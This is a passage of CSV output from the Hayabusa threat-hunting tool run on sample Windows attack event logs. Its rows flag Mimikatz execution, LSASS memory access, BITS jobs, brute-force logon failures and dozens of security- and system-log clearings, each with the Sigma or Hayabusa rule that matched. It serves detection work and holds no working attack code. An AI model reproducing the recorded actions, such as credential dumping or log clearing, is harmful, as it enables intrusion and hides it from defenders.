Files\Elastic\Endpoint\elastic-endpoint.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx -2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer : URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: mimikatz.exe : Path: C:\TOOLS\Mimikatzx64\mimikatz.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx -2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx -2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx -2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx -2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx -2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 